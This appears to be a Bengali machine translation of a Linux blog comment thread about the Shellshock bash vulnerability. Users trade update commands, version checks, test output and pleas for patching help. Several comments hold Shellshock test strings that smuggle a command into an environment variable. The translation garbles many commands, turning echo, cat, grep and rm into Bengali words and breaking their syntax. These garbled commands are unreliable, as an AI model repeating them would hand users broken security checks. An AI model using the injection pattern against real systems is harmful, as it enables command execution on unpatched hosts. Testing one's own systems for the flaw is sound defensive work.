স্প্যামের জন্য ওএস এক্সে ইউয়ো পরের মন্তব্য .. lla tu save .. 😛
উয়েও সেখানে উক্তিগুলি ঠিক করার জন্য ... তবে বাকি আপনি জানেন 😉
এফএসএফ কথা বলেছে
https://fsf.org/news/free-software-foundation-statement-on-the-gnu-bash-shellshock-vulnerability
তারা ওএসএক্সের পৃষ্ঠপোষকতায় পরিণত হয়েছে (কারণ ওএসএক্স এখনও ব্যাশ ব্যবহার করে: v)।
যাইহোক, আমার এত বেশি ডেবিয়ান জেসির সাথে ঝামেলা করতে হবে না।
যদি সিস্টেমটি ওএসের ক্ষেত্রে দুর্বল হয়:
yum সমস্ত && এর আপডেট আপডেট করুন clean
বাশ সংস্করণ দেখতে:
rpm -qa | গ্রেপ ব্যাশ
সংস্করণটি যদি bash-4.1.2-15.el6_5.1 এর আগের হয় তবে আপনার সিস্টেমটি দুর্বল হতে পারে!
গ্রিটিংস।
২ য় দুর্বলতা এখনও সমাধান হয়নি
env amvariable2 = '() {(a) => sh' sh -c "প্রতিধ্বনি amVulnerable"; bash -c "প্রতিধ্বনি ব্যর্থতা 2 আনপ্যাচড"
আপডেট হচ্ছে ...
জেন্টুতে আমার বিপরীত ঘটে, আমি কেবল প্রথম ব্যর্থতার জন্যই দুর্বল কিন্তু দ্বিতীয়টির সাথে আমি এটি পাই:
[কোড] শ: এক্স: লাইন 1: অপ্রত্যাশিত উপাদানগুলির নিকটে সিনট্যাকটিক ত্রুটি `= '
sh: এক্স: লাইন 1: '' '
sh: এক্স এর জন্য ফাংশন সংজ্ঞা আমদানি করার সময় ত্রুটি
sh: দুর্বল: কমান্ড পাওয়া যায় নি
বাগ 2 প্যাচড নয়
[/ কোড]
আমি জানি না যে বাগগুলি স্থির করে নিয়ে ইতিমধ্যে বাশের একটি স্থিতিশীল সংস্করণ থাকবে কিনা তবে পরের বারের মতো এটি আমার জন্য মুলতুবি থাকবে –সেনসি && উত্সাহে -দীপ-দীপ-উইথ-বিডিপ্স = এবং wনিউজ @ ওয়ার্ল্ড (এভাবেই পদক্ষেপ আমি সম্পূর্ণ সিস্টেম আপডেট)।
আমি 4.2_p50 সংস্করণ সহ জেন্টু পেয়েছি এবং এখন পর্যন্ত এটি সমস্ত পরীক্ষায় উত্তীর্ণ হয়েছে। উদীয়মান ncসাইকটি চেষ্টা করুন এবং তারপরে -av1 অ্যাপ্লিকেশন-শেলস / ব্যাশটি উত্থাপন করুন এবং তারপরে বাশ –version কমান্ডটি ব্যবহার করে আপনার সংস্করণ 4.2_p50 রয়েছে কিনা তা পরীক্ষা করে দেখুন।
আপনি কি এই চেষ্টা করেছেন?
এবং নতুন প্যাকেজ সহ, রেড হ্যাট দ্বারা সরবরাহ করা একটি নতুন পরীক্ষা
সিডি / টিএমপি; আরএম-এফ / টিএমপি / প্রতিধ্বনি; env 'x = () {(a) => b' bash -c "প্রতিধ্বনি তারিখ"; বিড়াল / tmp / প্রতিধ্বনি
যদি আমাদের সিস্টেমটি দুর্বল না হয় এবং সঠিকভাবে প্যাচ করা থাকে তবে এটি আমাদেরকে এ জাতীয় কিছু দিতে হবে
1 তারিখ
2 বিড়াল: / tmp / প্রতিধ্বনি: ফাইল বা ডিরেক্টরি বিদ্যমান নেই
এইভাবে চেষ্টা করুন:
env X = '() {(a) => sh' sh -c "প্রতিধ্বনি দুর্বল"; bash -c "প্রতিধ্বনি ব্যর্থতা 2 প্যাচড"
আমি পাই
জেয়
বাগ 2 প্যাচড।
এটি ভুলে যান, লাইনটি খারাপভাবে ফর্ম্যাট হয়েছে।
দুর্দান্ত! আমি ইতিমধ্যে আমার স্ল্যাকওয়্যারটিতে আপডেটটি করেছি, ধন্যবাদ!
হাই, আমার একটি প্রশ্ন আছে, "সুস লিনাক্স এন্টারপ্রাইজ সার্ভার 10" 64 বিট সহ আমার বেশ কয়েকটি সার্ভার রয়েছে।
যখন আমি কমান্ডগুলি কার্যকর করি তখন আমি দুর্বল, আমি আইফোন 6 এক্সডি ট্র্যাশের চেয়ে আরও বেশি দুর্বল হয়ে পড়েছি
আমি যদি SUSE- তে প্যাকেজ আপডেট / ইনস্টল করতে ভুল না করি তবে এটি «zypper command কমান্ডের সাহায্যে সম্পন্ন হবে»
কিছু সার্ভারে এটি আমাকে এটি বলে:
বিয়াল: ~ # জিপার আপ
-বাশ: জিপার: কমান্ড পাওয়া যায় নি
বিয়াল: ~ #
এবং অন্যদের মধ্যে এটি:
এসএমবি: ~ # জিপার আপ
সিস্টেম উত্স পুনরুদ্ধার করা হচ্ছে ...
সুস লিনাক্স এন্টারপ্রাইজ সার্ভার 10 SP2-20100319-161944 এর জন্য মেটাডেটা পার্সিং করা হচ্ছে…
আরপিএম ডাটাবেস পার্স করা হচ্ছে ...
সারাংশ:
কিছুই করার নাই.
আমি কি করবো?
আমি জানি যে কেউ কেউ বলেছেন যে দুর্বলতা তারা এটিকে আঁকেন তার চেয়ে কম তবে আমার কাছে তা রয়েছে এবং আমি ঝুঁকির মুখোমুখি হতে চাই না, তা সে ছোট হোক বা দুর্দান্ত হোক।
গ্রিটিংস।
শুভ রাত্রি, আমি নিবন্ধে আপনি যে কোডটি দিয়েছিলেন তা পেস্ট করার চেষ্টা করেছি, আমি এটি পেয়েছি
স্যান্ডার্স @ পিসি-স্যান্ডার্স: ~ $ এনভ এক্স = '() {:;}; প্রতিধ্বনিত 'বাশ-সি "প্রতিধ্বনি এটি একটি পরীক্ষা"
এটা একটা পরীক্ষা
স্যান্ডার্স @ পিসি-স্যান্ডার্স: ~ $
আপনি কীভাবে আমাকে ডিস্ট্রোকে প্যাচ করবেন তা আমাকে ব্যাখ্যা করতে পারেন, আমি প্রতিদিন আপডেট করি এবং আমি প্রম্পটের আউটপুটটিতে পরিবর্তন দেখতে পাই না।
ধন্যবাদ!